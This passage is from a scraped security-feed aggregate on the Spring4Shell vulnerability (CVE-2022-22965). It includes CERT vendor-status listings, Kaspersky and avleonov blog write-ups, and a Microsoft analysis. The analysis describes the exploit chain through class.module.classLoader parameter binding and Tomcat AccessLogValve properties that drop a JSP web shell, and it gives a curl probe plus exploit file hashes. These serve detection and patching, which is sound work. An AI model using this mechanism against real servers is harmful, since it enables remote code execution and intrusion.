the vendor.\n\n#### References\n\n * <https://discuss.elastic.co/t/spring4shell-spring-framework-remote-code-execution-vulnerability/301229>\n\n### F5 Networks __ Not Affected\n\nNotified: 2022-04-01 Updated: 2022-04-20\n\n**Statement Date: April 15, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nF5 products and services and NGINX products are not affected by CVE-2022-22965.\n\n#### References\n\n * <https://support.f5.com/csp/article/K11510688>\n\n### Jenkins __ Not Affected\n\nNotified: 2022-04-06 Updated: 
2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.jenkins.io/blog/2022/03/31/spring-rce-CVE-2022-22965/>\n\n### Micro Focus __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.microfocus.com/s/article/KM000005107?language=en_US>\n\n### Okta Inc. __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-04 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://sec.okta.com/articles/2022/04/oktas-response-cve-2022-22965-spring4shell>\n\n### Palo Alto Networks __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.paloaltonetworks.com/CVE-2022-22963>\n\n### Pulse Secure __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB45126/?kA13Z000000L3sW>\n\n### Red Hat __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Red Hat products are affected by CVE-2022-22963.\n\n### salesforce.com __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://kb.tableau.com/articles/Issue/Spring4Shell-CVE-2022-22963-and-CVE-2022-22965>\n\n### 
SonarSource __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-06 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.sonarsource.com/t/sonarqube-sonarcloud-and-spring4shell/60926>\n\n### Trend Micro __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-08\n\n**Statement Date: April 06, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://success.trendmicro.com/dcx/s/solution/000290730>\n\n### Ubiquiti __ Not Affected\n\nNotified: 2022-04-06 Updated: 2022-04-08\n\n**Statement Date: April 08, 2022**\n\n**CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe UniFi Network application only supports Java 8, which is not affected by this CVE. Still, the upcoming Network Version 7.2 update will upgrade to Spring Framework 5.3.18.\n\n#### References\n\n * <https://community.ui.com/releases/Statement-Regarding-Spring-CVE-2022-22965-2022-22950-and-2022-22963-001/19b2dc6f-4c36-436e-bd38-59ea0d6f1cb5>\n\n### Veritas Technologies __ Not Affected\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.veritas.com/content/support/en_US/security/VTS22-006>\n\n### Atlassian __ Unknown\n\nNotified: 2022-04-01 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.developer.atlassian.com/t/attention-cve-2022-22965-spring-framework-rce-investigation/57172>\n\n### CyberArk __ Unknown\n\nUpdated: 2022-04-12 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * 
<https://cyberark-customers.force.com/s/article/Spring-Framework-CVE-2022-22965>\n\n### Fortinet __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://fortiguard.fortinet.com/psirt/FG-IR-22-072>\n\n### GeoServer __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://geoserver.org/announcements/vulnerability/2022/04/01/spring.html>\n\n### Kofax __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- 
\n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated:** | 2022-05-19 16:09 UTC \n**Document Revision:** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. 
By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework's data binding functionality, which is used to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in newer JDK versions an alternative path exists for such exploitation, for example through the Java 9 Platform Module System.\n\nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. SpEL is a special expression language created for the Spring Framework that supports queries and object graph management at runtime. 
This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations for Spring vulnerabilities exploitation\n\nCVE-2022-22965 is fixed in 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). 
And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): "Spring4Shell", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. 
Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on GitHub](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to versions 5.3.18 or 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find Java 9+ with `locate`\n * Find "`spring-webmvc-*.jar`", "`spring-webflux*.jar`" or "`spring-boot*.jar`" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first; it is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201cclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7 or 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). 
\n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2022-04-11T23:40:15", "description": "**_April 11, 2022 update_** \u2013 _Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now have enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). See the Detect and protect with Azure Web Application Firewall (Azure WAF) section for details._\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell) and for ways to detect vulnerable installations on their network.\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. 
In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve_ object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n   * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n   * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\nFigure 2. Screenshot from the original POC code post\n\nFigure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public String handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So if, for instance, _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(String country) {\u2026} \n public void setCity(String city) {\u2026} \n public String getCountry() {\u2026} \n public String getCity() {\u2026} \n }\n\nand we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nthe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and the city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try to initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_, Spring would try to set those values in the _coordinates_ member of _location_ before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try to bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, suppose a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If _location_ has a _getX()_ accessor, call it to get the _x_ member of _location_\n 3. Use Java introspection to map all accessors and mutators in the _x_ object\n 4. If the _x_ object has a _getY()_ accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the _y_ object\n 6. 
If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor that gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve_ is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory:** The path where the access log is stored, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by HTTP requests, such as the web application\u2019s directory.\n 2. **Prefix:** The prefix of the access log file name.\n 3. **Suffix:** The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern:** A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as 